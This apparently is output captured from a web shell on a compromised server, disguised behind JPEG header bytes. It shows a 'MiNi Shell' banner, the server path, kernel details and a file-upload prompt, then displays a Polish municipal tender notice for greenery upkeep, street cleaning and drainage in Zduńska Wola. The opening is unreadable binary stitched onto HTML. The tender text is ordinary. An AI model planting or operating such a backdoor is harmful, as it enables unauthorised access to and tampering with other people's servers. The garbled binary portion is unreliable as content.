JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141215/410282-N-2014.html

<p class="kh_header"><b>Zduńska Wola: Utrzymanie zieleni, sprzątanie terenów miejskich, pasów drogowych dróg gminnych oraz  utrzymanie powierzchniowego systemu odwodnienia  na terenie miasta Zduńska Wola w 2015 roku</b><br>
<b>Numer ogłoszenia: 410282 - 2014; data zamieszczenia: 15.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zduńska Wola , ul. Stefana Złotnickiego 12, 98-220 Zduńska Wola, woj. łódzkie, tel. 43 825 02 00, faks 43 825 02 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdunskawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni, sprzątanie terenów miejskich, pasów drogowych dróg gminnych oraz  utrzymanie powierzchniowego systemu odwodnienia  na terenie miasta Zduńska Wola w 2015 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Utrzymanie zieleni, sprzątanie terenów miejskich, pasów drogowych dróg gminnych oraz  utrzymanie powierzchniowego systemu odwodnienia na terenie miasta Zduńska Wola w 2015 roku
z podziałem na 5 części:
Część nr 1
					
Obejmuje utrzymanie terenów zieleni urządzonej  należących do  miasta Zduńska  Wola  parki, skwery, place zabaw).

Wymagany standard określa utrzymanie zieleni oraz czystości  i  zapewnia:
estetyczny wygląd terenu zgodny z zasadami przepisów porządkowych i sanitarnych, bezpieczny stan ciągów pieszych podczas występowania warunków zimowych, prawidłowy stan zieleni zgodny z zasadami sztuki ogrodniczej oraz wynikający z warunków agrotechnicznych i pogodowych, należyty stan elementów małej architektury umożliwiający ich bezpieczne użytkowanie,
bezpieczny stan elementów placów zabaw.

Wymagane roboty na terenach zlokalizowanych w północnej części miasta  Zduńska Wola 
1. omiatanie alejek parkowych i zatok parkingowych - codziennie w okresie od kwietnia   do listopada (na terenie skweru Konstytucji 3-go Maja, przed budynkiem USC oraz przed Dworkiem Stefana Złotnickiego) na pozostałym terenie trzy razy w tygodniu;
sprzątanie połamanych gałęzi, kwiatostanów i owoców drzew po wichurach niezależnie od ustalonej częstotliwości.
2. opróżnianie koszy - co drugi dzień do godziny 8 rano, malowanie koszy w terminie do dnia 1 maja, konserwacja koszy (drobne naprawy);
3. odśnieżanie  pieszo-jezdnych  ciągów komunikacyjnych, dróg dojazdowych  wewnętrznych, parkingów, alejek parkowych na szerokość  dostosowaną  do ich  szerokości (nie szerzej niż 2 m) nie później niż dwie  godziny od zakończenia opadów, przeciwdziałanie  śliskości, usuwanie błota pośniegowego 
z  wymienionych  utwardzonych  ciągów komunikacyjnych;
4. prace porządkowe: zbieranie papierów, szkła, niedopałków papierosowych, połamanych gałęzi, zasypywanie dołów kopanych przez psy,  rozrzucanie kretowin itp - codziennie w okresie od kwietnia   do listopada (na terenie skweru Konstytucji 3-go Maja, przed budynkiem USC oraz przed Dworkiem Stefana Złotnickiego) na pozostałym terenie dwa razy w tygodniu. Zbieranie zanieczyszczeń z terenów objętych umową w  okresie zimowym  - w przypadku wystąpienia zaśmiecenia terenu;
5. malowanie ławek parkowych w terminie do 1 maja, mycie zabrudzonych ławek wg potrzeb, naprawa zniszczonych elementów  ławek tj. uzupełnianie brakujących śrub i desek zmalowaniem (malowanie dwukrotne powierzchni po uprzednim zeszlifowaniem odstającej starej farby);
6. koszenie terenów zieleni  -  6 razy w sezonie (terminy koszenia uzgodnione z zamawiającym);
7. pielęgnacja  krzewów rosnących w  skupieniach i żywopłotach (odchwaszczanie,  przycinanie,  zasilanie - 3 razy w sezonie wegetacyjnym, podlewanie w okresach suszy wg potrzeb;
8.  zwalczanie (chemiczne i mechaniczne)  chwastów w alejkach i na powierzchniach  utwardzonych;
9.  jesienne wygrabianie liści z trawników (nie rzadziej niż 2 razy w tygodniu);
10.ułożenie okrywy zabezpieczającej przed przemarzaniem  roślin posadzonych w poprzednim i bieżącym  roku (jeżeli wystąpią nasadzenia),
11. utrzymanie miejsc pamięci narodowej (mycie pomników, utrzymanie porządku, obsadzenia roślinami  miejsc  do tego przeznaczonych,  ustawianie zniczy i ułożenie  po jednej wiązance na świerku  w wymienionych niżej miejscach i  terminach:
   
 Cmentarz Katolicki    
       pomnik Honoraty Złotnickiej, płyta Stefana Złotnickiego                Święto Miasta i 1 listopada 
       Mogiła zbiorowa  + kwatera                                                                 1września i  1 listopada
       Mogiła siostry PCK                                                                              1września i  1 listopada
       Mogiła lotników                                                                                    1września i  1 listopada 
  Mogiła Sylli i Kałużewskiego (tylko wiązanka i znicze )                       1września i  1 listopada
Plac Wolności
płyta Rozstrzelanym przez hitlerowców 11 listopada 1939 r.             1 września i 11 listopada
    pomnik Józefa Piłsudskiego                                                                                      11 listopada;
	                                                                                                           12. opryski chemiczne drzew przeciw chorobom grzybowym i szkodnikom - 2 razy w sezonie wegetacyjnym - kasztanowce, wiązy, głogi;
13. opieka nad placami zabaw: konserwacja elementów statycznych i dynamicznych, uzupełnianie  brakujących elementów - deski bale, siedziska, wymiana piasku  w piaskownicach -2 x w sezonie (w terminie ustalonym z zamawiającym),  malowanie elementów drewnianych wymagających odświeżenia;
14. przeciwdziałanie chemiczne i biologiczne  przeciwko  wykwitom glonów na stawach środkami chemicznymi dopuszczonymi do obrotu.  Czyszczenie lustra wody przy brzegach skarp na stawach nie rzadziej  niż 2 razy w tygodniu oraz czyszczenie zastawek z naniesionych śmieci w zależności od potrzeb, regulacja poziomu lustra wody  (wg poleceń Zamawiającego). Jednokrotne zarybienie  gatunkami roślinożernymi 200 kg narybku wg potrzeb;
15. odchwaszczanie skarp stawów i rzeki  Pichny w granicach Parku Miejskiego;
16. malowanie  barierek, słupków do tablic  informacyjnych -1 raz w sezonie w terminie  uzgodnionym  z zamawiającym;
17. mycie znaków i tablic informacyjnych, konserwacja i regulacja podpór zastosowanych do zabezpieczenia  starodrzewu na terenie Parku Miejskiego ( w ustaleniu z Zamawiającym); 
18. dokarmianie i opieka nad łabędziem  oraz zapewnienie  miejsca schronienia w okresie zimowym (przetrzymanie łabędzia w miejscu schronienia i dokarmianie go w okresie zimy do następnego sezonu, przywiezienie z miejsca zimowania na staw w następnym sezonie  wiosennym w terminie uzgodnionym 
z zamawiającym;
19. strącanie gniazd budowanych przez ptaki na drzewach poza okresem ochronnym określonym w  ustawie o  ochronie przyrody (tj.  od 15 października - do końca lutego); 
20. ukwiecenia - w terminach ustalonych z zamawiającym bieżąca pielęgnacja kwietników, gazonów, oraz rabat kwietnych (uzupełnianie roślin, zasilanie nawozami - 6 razy w sezonie wegetacyjnym podlewanie na bieżąco);      
 * wymagana  norma nasadzeń dla  1 kwietnika typu  120 x120 - 6 pierścieni  o   konstrukcji  metalowej 
    1 sadzenie:
         sadzonki roślin pnących typu: surfinia, pelargonia, obsadzanych w systemie:
         1,2,4,6 warstwa - 50 sztuk. 
    2 i 3  sadzenie:( trzecie sadzenie wg potrzeb)
         sadzonki roślin o pędach wyprostowanych typu  chryzantemy, begonie, obsadzane w systemie wszystkich warstw  -85 sztuk .    
Pozostałe gazony obsadzanie jw  w ilości dostosowanej do wielkości gazonów.
     * wymagana  norma nasadzeń na rabatach gruntowych: trzykrotna wymiana i uzupełnianie roślin jednorocznych:   
rodzaju: begonia łuskowata, starzec, szałwia, żeniszek, aksamitka, bratek, godecja, niecierpek 
w rozstawie 20 x20 cm;( do wyboru)

21. przyozdabianie kwietników igliwiem świerkowo-sosnowym na okres zimowy;

materiały niezbędne do realizacji zamówienia takie jak paliki, taśmy, nawozy, woda, opryski, piasek, kwiaty, znicze, stroisz, farby, deski  itp. należy wliczyć w cenę zamówienia.


Wymagane roboty na terenach zlokalizowanych w południowej części miasta  Zduńska Wola
Wykonawca zobowiązuje się do świadczenia na rzecz Zamawiającego następujących usług  zlokalizowanych w południowej części miasta  Zduńska Wola:  

1. omiatanie alejek parkowych - 2 razy w tygodniu;
2. opróżnianie koszy  - dwa razy w tygodniu do  godziny 8 rano, malowanie koszy w terminie do 1 maja, konserwacja koszy - drobne naprawy;
3. odśnieżanie  alejek parkowych na szerokość   dostosowaną   do ich  szerokości (nie szerzej niż 2 m) nie później niż dwie godziny od zakończenia opadów; przeciwdziałanie  ich śliskości,  usuwanie błota pośniegowego z utwardzonych  ciągów komunikacyjnych;
4. prace porządkowe: zbieranie papierów, szkła, niedopałków papierosowych, połamanych gałęzi, zasypywanie dołów kopanych przez psy, rozrzucanie kretowin itp - dwa razy w tygodniu od kwietnia do listopada. Zbieranie śmieci z terenów objętych umową w pozostałym okresie trwania umowy - 
w przypadku wystąpienia zaśmiecenia terenu; 
5. malowanie ławek parkowych w terminie do 1 maja;  mycie zabrudzonych ławek wg potrzeb; naprawa zniszczonych elementów ławek tj. uzupełnianie brakujących śrub i desek z malowaniem ( malowanie dwukrotne powierzchni po uprzednim zeszlifowaniem odstającej starej farby);
6. koszenie terenów zieleni -  5 razy (termin koszenia uzgodniony  z zamawiającym);
7. pielęgnacja  krzewów rosnących w  skupinach i żywopłotach (odchwaszczanie, przycinanie, zasilanie  -  3 razy w sezonie wegetacyjnym, podlewanie w okresach suszy;
8. zwalczanie ( chemiczne i mechaniczne ) chwastów w alejkach i na powierzchniach utwardzonych;
9. jesienne wygrabianie liści z trawników (nie rzadziej niż 1 raz w tygodniu);
10. ułożenie okrywy zabezpieczającej przed przemarzaniem roślin posadzonych w poprzednim i bieżącym roku (jeżeli wystąpią nasadzenia);
11. opryski chemiczne drzew i krzewów  przeciw chorobom grzybowym i szkodnikom - 2 razy w sezonie wegetacyjnym - jeżeli wystąpią choroby grzybowe drzew;
12. opieka nad placami zabaw: konserwacja elementów statycznych i dynamicznych; uzupełnianie brakujących elementów - deski bale; siedziska; wymiana piasku  w piaskownicach -2 x w sezonie 
(w terminie ustalonym z zamawiającym),  malowanie elementów drewnianych wymagających odświeżenia;
13. mycie znaków i tablic informacyjnych (w zależności od potrzeb);
14. malowanie słupków do tablic  informacyjnych  w terminie  do 1 maja.

 Wymagane roboty na terenach przyległych do  zbiornika Kępina:  
1. koszenie terenów przyległych do zbiornika Kępina  -dwa razy w sezonie bez wywozu trawy (w terminie uzgodnionym z zamawiającym),
2. malowanie ławek - 1 raz w sezonie,
3. prace porządkowe różne: naprawa ławek, miejsc na ogniska (stoły; ławy) zbieranie papierów, zbieranie  skoszonej przez Koło wędkarskie trzciny z wywozem (w terminie uzgodnionym z zamawiającym)
4. opróżnianie koszy  na odpady  1 raz w tygodniu, opróżnianie beczek na odpady  po uzgodnieniu ze zleceniodawcą - 2 razy w miesiącu w okresie od kwietnia do listopada. 
5. sprzątanie palenisk (w/g potrzeb), 
6. mechaniczne usuwanie przerostów ze schodów kamiennych stanowiących umocnienie skarpy zbiornika, ( 2 razy w sezonie) 
7. bieżące  oczyszczanie wlotu i wylotu wody z Kępiny.

Zamawiający wymaga aby:

1.  Jeden raz w tygodniu  wykonawca dokonywał kontrole poprzez oględziny elementów siłowni  zlokalizowanej przy ul. Okrzei 2a, odnotowując spostrzeżenia w protokole kontroli zgodnie z załącznikiem; 
2. w pracach pielęgnacyjnych drzewostanu parkowego brały udział osoby posiadając przeszkolenia z  zakresu pielęgnacji drzew ozdobnych;
3. materiały niezbędne  do realizacji zamówienia takie jak  paliki, taśmy, nawozy, woda, opryski, piasek, kwiaty, znicze, stroisz, farby, deski  itp. należy wliczyć w cenę zamówienia;
4. ubytki po oczyszczeniu oraz rany powstałe po cięciach należy zabezpieczyć preparatem o właściwościach chroniących przed infekcją grzybów patogenicznych, - przyśpieszających gojenie się ran;
    
Część nr  2 

Obejmuje utrzymanie zieleni oraz sprzątanie pasów drogowych dróg gminnych  na terenie miasta Zduńska Wola

Zadanie IIA
Wymagany standard określający utrzymanie zieleni oraz sprzątanie pasów drogowych dróg gminnych:
1) estetyczny wygląd pasów drogowych, zgodny z przepisami porządkowymi i sanitarnymi;
2) utrzymywanie prawidłowego stanu zieleni zgodnie z zasadami sztuki ogrodniczej, warunkami  agrotechnicznych oraz warunkami pogodowymi;
3) bezpieczny stan ciągów pieszych i  ścieżek rowerowych w warunkach zimowych.
Szczegółowy wykaz prac w zakresie utrzymania zieleni oraz  sprzątania  pasów drogowych dróg gminnych:
1.Omiatanie powierzchni utwardzonych (chodniki, place, zatoki postojowe, ścieżki rowerowe, opaski) - w zależności od potrzeby.
2.Odśnieżane ciągów pieszych, ścieżek rowerowych, przeciwdziałanie i likwidacja śliskości  poprzez posypywanie materiałem uszorstniającym (mieszanka piasku i soli 4%) w zależności od warunków                        atmosferycznych, nie później niż dwie godziny od zakończenia opadów, usuwanie błota pośniegowego - w zależności od potrzeby.
3. Prace porządkowe (powierzchnie utwardzone i nieutwardzone) - zbieranie zanieczyszczeń (papierów, szkła, niedopałków papierosowych, połamanych gałęzi, rozrzucanie kretowin w okresie bez-śniegowym) - min. 2 razy na tydzień w okresie od kwietnia do listopada. Zbieranie zanieczyszczeń w pozostałym okresie trwania umowy w zależności od potrzeb.
4. Koszenie zieleńcy, trawników wraz z zebraniem zanieczyszczeń i wywozem - trzy razy w okresie od kwietnia do listopada (termin koszenia uzgodniony z zamawiającym).
5. Przycinanie i odchwaszczanie żywopłotów (wraz z wywozem zanieczyszczeń) - dwa razy w okresie  od kwietnia do listopada (termin wykonania prac uzgodniony z zamawiającym).
6. Pielęgnacja krzewów i rabat: odchwaszczanie (wraz z wywozem zanieczyszczeń), przycinanie,  zasilanie - dwa razy w okresie trwania umowy, podlewanie w okresach suszy.
7. Ułożenie okrywy zabezpieczającej przed przemarzaniem roślin posadzonych w danym sezonie wegetacyjnym (jeśli wystąpią nasadzenia).
8. Usuwanie przerostów (chemiczne i mechaniczne) z powierzchni utwardzonych.
9. Jesienne wygrabianie i sprzątanie liści (wraz z wywozem) z powierzchni utwardzonych (ciągi piesze, place, zatoki postojowe, ścieżki rowerowe, opaski) oraz nieutwardzonych (trawniki, zieleńce) - nie rzadziej niż jeden raz w tygodniu.
10. Jednokrotne malowanie ławek w okresie wiosennym, bieżące mycie zabrudzonych i naprawa  zniszczonych elementów (uzupełnianie brakujących desek).
11.Ukwiecenia (w terminach ustalonych z zamawiającym) oraz bieżąca pielęgnacja kwietników    i gazonów (uzupełnianie roślin, zasilanie nawozami - 3 razy w sezonie wegetacyjnym, podlewanie   na bieżąco):
* wymagana forma nasadzeń dla kwietnika typu 120x120 - 6 pierścieni o konstrukcji metalowej 
1 sadzenie: bratki - 50 szt. obsadzanych w systemie 1, 2, 4, 6 warstwa (gazon-1 szt) + kwietniki betonowe  (3 szt. prostokątne + 2 misy śr. 135 cm) na jeden kwietnik 30 szt.

2 sadzenie:
- sadzonki roślin pnących typu: surfinia, pelargonia - obsadzane w systemie wszystkich  warstw   (gazon - 1szt.) - 65 szt.
kwietniki - sadzonki roślin typu: szałwia, aksamitka, begonia, starzec (kwietniki  betonowe - 5 szt) - 25 szt. na jeden kwietnik.
12. Przyozdobienie kwietników igliwiem świerkowo-sosnowym na okres jesienno-zimowy.
13. Odpady powstałe przy wykonywaniu prac związanych z przedmiotem zamówienia stają się własnością Wykonawcy
 i powinny być unieszkodliwione zgodnie z Ustawą o odpadach (Dz. U. 2013 poz. 21 ze zmianami).
Zadanie IIB - Dodatkowe czynności w zakresie utrzymania zieleni oraz  sprzątania pasów drogowych dróg gminnych. Szczegółowy zakres wykonywanych robót będzie każdorazowo określany w dyspozycji upoważnionego pracownika Zamawiającego w zleceniu jednostkowym.
Zadanie IIC - Inne dodatkowe czynności, które występują lub mogą wystąpić, w zakresie utrzymania zieleni oraz sprzątania pasów drogowych dróg gminnych rozliczane będą w oparciu  o stawki jednostkowe zgodnie z tabelą.
Szczegółowy zakres wykonywanych robót będzie każdorazowo określany w dyspozycji upoważnionego       pracownika Zamawiającego w zleceniu jednostkowym.
Dodatkowe  czynności rozliczane będą w oparciu o nakłady norm rzeczowych, określone w katalogach branżowych oraz kalkulacje własne uprzednio zatwierdzone przez Zamawiającego, obowiązujące w chwili ustalania wysokości wynagrodzenia.


Część nr 3  
	     
Zadanie III A
Obejmuje utrzymanie terenów miejskich należących do miasta Zduńska Wola poza terenami  (takimi jak parki, skwery, place zabaw i pasy dróg).

Wymagane roboty na działkach miejskich należących do miasta Zduńska Wola w okresie trwania umowy.

1. Wymienione działki miejskie z tabeli nr 1 - koszenie wraz z zebraniem śmieci i wywozem zanieczyszczeń trzy razy od kwietnia do listopada (po uprzednim uzgodnieniu terminu koszenia z Zamawiającym).
2. Pielęgnacja żywopłotów występujących na działkach miejskich, polegających na dwukrotnym przycięciu wraz z wywozem powstałego odpadu, a w przypadku wystąpienia szkodników bądź chorób, minimum dwukrotnym oprysku w okresie trwania umowy (po uprzednim uzgodnieniu z Zamawiającym).
3. W okresie jesiennym wygrabianie liści wraz z wywozem do trzech razy na działkach z uwagą dotyczącą grabienia liści (tak, nie lub częściowo tak), po uprzednim uzgodnieniu terminu grabienia z Zamawiającym.
4. Wymienione działki miejskie z tabeli  nr 2- koszenie wraz z zebraniem śmieci i wywozem zanieczyszczeń dwa razy od kwietnia do listopada (po uprzednim uzgodnieniu terminu koszenia z Zamawiającym).
5. Chodniki, miejsca utwardzone i parkingi z tabel nr 1 i 2 należy utrzymać w estetycznym wyglądzie zgodnym z zasadami przepisów porządkowych i sanitarnych, oraz zapewnić bezpieczny stan ciągów pieszych podczas występowania różnych warunków atmosferycznych przez co rozumie się: (omiatanie, odchwaszczanie mechaniczne lub chemiczne, usuwanie przerostów, usuwanie liści i zanieczyszczeń, a w okresie opadów śniegu i niezwłocznie po jego ustaniu do dwóch godzin - odgarnięcie śniegu oraz zapobieganie śliskości chodników przez posypywanie mieszanką piasku i soli 4%).
6. Obsługa i utrzymanie ławek i koszy znajdujących się na terenach miejskich w tym (opróżnianie koszy wraz z wywozem zanieczyszczeń trzy razy w tygodniu), malowanie raz w roku, oraz przeprowadzenie na własny koszt drobnych napraw eksploatacyjnych związanych  z właściwym utrzymaniem stanu technicznego (w ławkach wymiana uszkodzonych desek wraz z ich pomalowaniem ). 
7. Zbieranie zanieczyszczeń raz w tygodniu (papiery, butelki, foliówki itp.) z działek miejskich wymienionych w tabeli nr 1 wraz z ich wywozem.
8. Działki do uporządkowania z tabeli nr 1 i nr 2, zaznaczone znakiem* - wyrównanie terenu.
9. Na targowisku miejskim przy ul Adama Mickiewicza w okresie zimy Wykonawca zobowiązany jest do usunięcia sopli, nawisów i osuwisk śniegu z zadaszeń w celu umożliwienia prowadzenia działalności handlowej (wywóz śniegu wg potrzeb w miejsce wskazane przez Zamawiającego).
10. Płyta targowiska, ciągi piesze, parking i droga dojazdowa od str. ul. Adama Mickiewicza w okresie zimy mają być utrzymane w stopniu gwarantującym bezpieczne poruszanie się, oraz umożliwienie prowadzenia działalności handlowej. 
11. Niezwłoczne odśnieżanie w okresie opadów śniegu lądowiska i drogi dojazdowej dla Śmigłowców Ratownictwa Medycznego na terenie PPSP przy ul. Długiej 6, (po zgłoszeniu telefonicznym przez dyżurnego PPSP) o pow. 1600 m2. lądowisko plus droga dojazdowa - 50 m x 3 m = 150 m2.  1600+150 =1750 m2. 
12. Odpady powstałe przy wykonywaniu prac związanych z przedmiotem zamówienia stają się własnością Wykonawcy i powinny być unieszkodliwione zgodnie z Ustawą o odpadach (Dz. U. 2013 poz. 21 ze zmianami).
Trzykrotne koszenie działek miejskich z tabeli nr 1 o pow. : 176 897 m2 x 3 = 530 691 m2.
Dwukrotne koszenie działek miejskich z tabeli nr 2 o pow. : 129 743 m2 x 2 = 259 486 m2.
Utrzymanie w należytym porządku  (omiatanie, odśnieżanie, zapobieganie śliskości itp.) chodników, placów utwardzonych i parkingów niezależnie od pory roku z tabel nr 1 i 2 o łącznej pow. 47 634 m2.
Zadanie III B 
Dodatkowe  czynności, które występują bądź mogą wystąpić do  wykonania na zlecenie Zamawiającego.
Część nr 4 				

Wykonanie czynności związanych z bieżącym utrzymaniem i oczyszczaniem ok. 24090 mb rowów melioracyjnych, będących własnością miasta Zduńska Wola. 

Przez bieżące utrzymanie i oczyszczaniem rowów rozumie się:
utrzymanie drożności rowu;
utrzymanie drożności przepustu.
Prace związane z realizacją przedmiotu zamówienia będą każdorazowo zlecane z 7 dniowym wyprzedzeniem w okresie od stycznia do grudnia 2015 r. 
W zleceniu zostanie określona: dokładna lokalizacja miejsca oraz zakres przewidzianych do realizacji robót.
Odpady powstałe przy wykonywaniu prac związanych z przedmiotem zamówienia stają się własnością Wykonawcy i powinny być unieszkodliwione zgodnie z Ustawą o odpadach (Dz. U. 2013 poz. 21 ze zmianami).

Część nr  5 

Obejmuje interwencyjne usuwanie martwych zwierząt z pasa drogowego dróg gminnych i z terenów Miasta Zduńska Wola.
1. Usuwanie martwych zwierząt i ich szczątków z terenu całego Miasta Zduńska Wola z wyłączeniem, cmentarzy, prywatnych posesji i terenów będących poza władaniem Miasta Zduńska Wola. Przedmiot zamówienia obejmuje m.in. załadunek martwych zwierząt i ich szczątków na środek transportu oraz transport martwych zwierząt i ich szczątków do zakładu utylizacji odpadów, zgodnie z obowiązującymi przepisami sanitarnymi i posiadanymi zezwoleniami bądź do firmy zajmującej się utylizacją tego typu odpadów lub do innych uprawnionych podmiotów. 
2. Wykonanie usługi następować będzie na podstawie zgłoszenia telefonicznego przez Zamawiającego lub Straż Miejską w nieprzekraczalnym czasie 6 godzin od zgłoszenia. Zgłoszenia będą dokonywane w godzinach 7:00  - 22:00. Wykonawca jest zobowiązany przyjmować zgłoszenia w ww. godzinach.   
3. Wykonawca w trakcie wykonywania umowy musi posiadać aktualną decyzją Powiatowego Lekarza Weterynarii zatwierdzającą prowadzoną działalność w zakresie zbierania, transportu i usuwania ubocznych produktów pochodzenia zwierzęcego, a tym samym nadany weterynaryjny numer identyfikacyjny (zgodnie z ustawą z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (Dz. U. 2008 r. nr 213, poz. 1342). 

Wykonawca może złożyć ofertę na dowolną ilość części.

Zamawiający określa, że termin płatności dla niniejszego zamówienia musi mieścić się w przedziale od 21 do 30 dni..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.64.00.00-5, 77.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości: 15 000,00 złotych (słownie: piętnaście tysięcy złotych 00/100), przy czym wysokość wadium dla poszczególnych części wynosi:

Część nr 1   		 	 5.000,00 zł (słownie: pięć tysięcy złotych)
Część nr 2  			 5.000,00 zł (słownie: pięć tysięcy złotych)
Część nr 3 		   	         3.000,00 zł (słownie: trzy tysiące złotych)
Część nr 4 		   	         2.000,00 zł (słownie: dwa tysiące złotych) 
